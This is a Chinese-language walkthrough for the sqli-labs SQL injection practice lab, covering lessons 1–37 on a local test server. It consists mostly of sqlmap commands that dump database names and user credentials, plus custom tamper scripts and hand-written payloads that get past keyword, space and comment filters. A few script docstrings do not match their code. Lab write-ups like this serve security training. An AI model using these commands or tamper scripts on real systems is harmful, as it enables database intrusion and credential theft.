sqli-labs工具速通
Less-1
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security -T users -C username,password --dump
Less-2
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security -T users -C username,password --dump
Less-3
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security -T users -C username,password --dump
Less-4
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security -T users -C username,password --dump
Less-5
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security -T users -C username,password --dump
Less-6
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security -T users -C username,password --dump
Less-7
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security -T users -C username,password --dump
Less-8
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security -T users -C username,password --dump
Less-9
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security -T users -C username,password --dump
Less-10
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users -C username,password --dump
如果注不进入就把level提升到5,risk提升到2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch --dbs --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security --tables --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users --columns --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users -C username,password --dump --level=5 --risk=2
Less-11
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump
Less-12
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump
Less-13
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump
Less-14
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump
Less-15
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump
Less-16
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 --dbs
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security -T users -C username,password --dump
Less-17
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump
注意,因为该接口本身就是会对数据做更新的,因此使用sqlmap注入会导致数据被更新,密码会变为1
Less-18
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" --dbs --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump --level=3
Less-19
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" --dbs --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump --level=3
Less-20
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" --dbs --level=2
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security -T users -C username,password --dump --level=3
Less-21
发现cookie是admin=YWRtaW4=
,也就是cookie的值进行了base64编码,需要使用–tamper指定base64编码处理
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users -C username,password --dump
Less-22
类似Less-21
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users -C username,password --dump
Less-23
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security -T users -C username,password --dump
Less-24
二次注入,不适用sqlmap
Less-25
需要绕过and or过滤,可以使用双写的方式绕过
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py --dbs
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security -T users -C username,password --dump
"""
doubleandor.py
"""
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
"""
retVal = payload
if payload:
retVal = retVal.replace("and","anandd").replace("or","oorr").replace("AND","ANANDD").replace("OR","OORR")
return retVal
Less-26
本题除了过滤了and or外,空格和#也被过滤。and和or用双写绕过,空格用%a0绕过,#用 and '1
闭合语句进行绕过
基本的payload如下
?id=1'%a0anandd%a0extractvalue(1,concat(0x7e,(select%a0database()),0x7e))%a0anandd'1
我们可以使用自定义的脚本替换字符进行绕过,让sqlmap帮我们注入:
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor --dbs
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security -T users -C username,password --dump
ps:由于sqlmap生成的payload太长,暴字段和值的时候可能会有问题,暴值的时候可以一个字段一个字段注
-
hash2close.py:将#替换为
and '1
进行标签闭合#!/usr/bin/env python import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): """ >>> tamper("1#") "1 AND '1'='1" """ retVal = payload if not payload: return payload retVal = retVal.replace("#"," and '1' = '1") return retVal
-
space2a0.py:将空格替换为%a0
#!/usr/bin/env python import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): """ >>> tamper("1 and 1") "1%a0and%a01" """ retVal = payload if not payload: return payload retVal = retVal.replace(" ", "%a0") return retVal
-
doubleandor.py:将and、or进行双写
#!/usr/bin/env python import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): """ >>> tamper("1 AND '1'='1") "1 ANANDD '1'='1" """ retVal = payload if payload: retVal = re.sub(r"(?i)\bAND\b", "ANANDD", re.sub(r"(?i)\bOR\b", "OORR", payload)) return retVal
Less-27
由于页面返回自带Hint的原因,sqlmap无法识别并进行处理。
这一题过滤了union和select,使用报错注入
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect --dbs
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users -C username --dump
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users -C password --dump
hash2close,space2a0见Less-26
tripleselect.py:三写绕过select
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
>>> tamper("select")
"selselecselecttect"
"""
retVal = payload
if not payload:
return payload
retVal = re.sub(r"(?i)select", "selselecselecttect", retVal)
return retVal
Less-28
- 因为注释符号
--
和#
被过滤了,因此需要使用语句闭合末尾处。由于整个查询在括号内,因此闭合时需要注意加上括号,在末尾使用and ('1
闭合。或者使用;%00
也可以,其中%00是截断符号 union select
被过滤了,可以使用unionunion select select
或者使用union all select
,sqlmap自带了union all select,因此不需要设置- 空格可以使用
%0a
或者%a0
替换
?id=9999')%0aunionunion%0aselect%0aselect%0a1,database(),version();%00
?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(0x7e,%0atable_name,%0a0x7e),3%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database();%00
?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(0x7e,%0acolumn_name,%0a0x7e),3%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=database()%0aand%0atable_name='users';%00
?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(username),group_concat(password)%0afrom%0ausers;%00
sqlmap:
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 -D security -T users -C username --dump
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 -D security -T users -C password --dump
"""
comment2truncate.py
"""
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
>>> tamper("1#")
"1;%00"
>>> tamper("1--")
"1;%00"
"""
retVal = payload
if not payload:
return payload
retVal = retVal.replace("#",";%00").replace("--",";%00")
return retVal
space2a0见Less-26
ps:爆表字段可能存在使用工具会爆破失败的情况
Less-29
使用WAF进行了过滤,直接运行程序即可
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security -T users -C username,password --dump
Less-30
使用WAF进行了过滤,直接运行程序即可
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch --dbs --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security --tables --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security -T users --columns --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security -T users -C username,password --dump --level=2 --risk=2
Less-31
使用WAF进行了过滤,直接运行程序即可
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch --dbs --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security --tables --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security -T users --columns --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security -T users -C username,password --dump --level=2 --risk=2
Less-32
宽字节注入
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump
Less-33
宽字节注入
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump
Less-34
宽字节注入,只不过换成了POST方法
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users -C username,password --dump
Less-35
使用了addSlashes()函数转义,正常会想到宽字节,但是此题是数字型,非引号类型注入,因此直接注就行
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch -D security -T users -C username,password --dump
Less-36
转义的字符更多了,但宽字符注入仍有效
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump
Less-37
类似Less-36,换成了POST方法
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users -C username,password --dump